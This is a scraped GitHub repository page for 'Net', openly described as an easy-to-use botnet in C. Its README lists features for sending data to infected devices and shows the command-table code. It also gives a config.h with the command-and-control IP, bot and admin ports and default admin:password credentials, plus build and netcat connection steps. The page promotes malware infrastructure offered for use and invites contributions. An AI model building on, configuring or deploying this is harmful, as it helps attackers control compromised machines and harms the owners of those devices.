Skip to content

Navigation Menu

Sign in
Appearance settings

Search code, repositories, users, issues, pull requests...

Provide feedback

We read every piece of feedback, and take your input very seriously.

Saved searches

Use saved searches to filter your results more quickly

Appearance settings

0x1CA3/Net

Open more actions menu

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

10 Commits
10 Commits
 
 
 
 
 
 
 
 

Repository files navigation


Net - A botnet written in C.

Net is a very easy-to-use botnet that has several options while being highly customizable.

Version

Features

Feature Description
Multi-threading The server works in the background while the CLI is running.
Sending data You can send data to all the connected devices.
Clean interface Net has an easy-to-use clean CLI that is easy to navigate.
Dynamic Commands Net makes it very easy for you to add your own commands.

Dynamic Commands & Custom Commands

To add commands, simply create your function and then add the custom command and function to botnet_commands as shown below.

struct function botnet_commands[] = {
    {"custom_command", custom_function}, // <- The custom command goes right here! Make sure you have already written your function!
    {"?", help_menu},
    {"help", help_menu},
    {"bots", bot_count},
    {"list", bot_count},
    {"server", cnc_details},
    {"banner", display_banner},
    {"clear", clear_screen},
    {"cls", clear_screen},
};

Configuration

To edit the configuration for the botnet, head over to includes/config/config.h.

#pragma once


/*
    *    includes/config/config.h
    *    Date: 11/09/21
    *    Author: 0x1CA3
*/


#define USERNAME "admin"
#define PASSWORD "password"
#define MAX_DEVICES 99999
#define CNC_IP "127.0.0.1"
#define CNC_PORT 1337 /* This is the port your bots/infected devices will use to connect */
#define ADMIN_PORT 1233 /* This is the port you will use when connecting to the admin panel */					       

Installation & Setup

gcc -o net net.c -lpthread
./net
Open up a new terminal window
Connect to the CnC | Example: nc 127.0.0.1 3434
Login with the default credentials [admin:password]

Update Log

[11/9/21] - Removed 'adb_check' option
[11/9/21] - Remade 'Net'
[9/14/21] - Created 'Net'

Screenshots

botnet.png

Credits

https://github.com/0x1CA3

Contributions 🎉

All contributions are accepted, simply open an Issue / Pull request.

Releases

Packages

Contributors

Languages

Morty Proxy This is a proxified and sanitized view of the page, visit original site.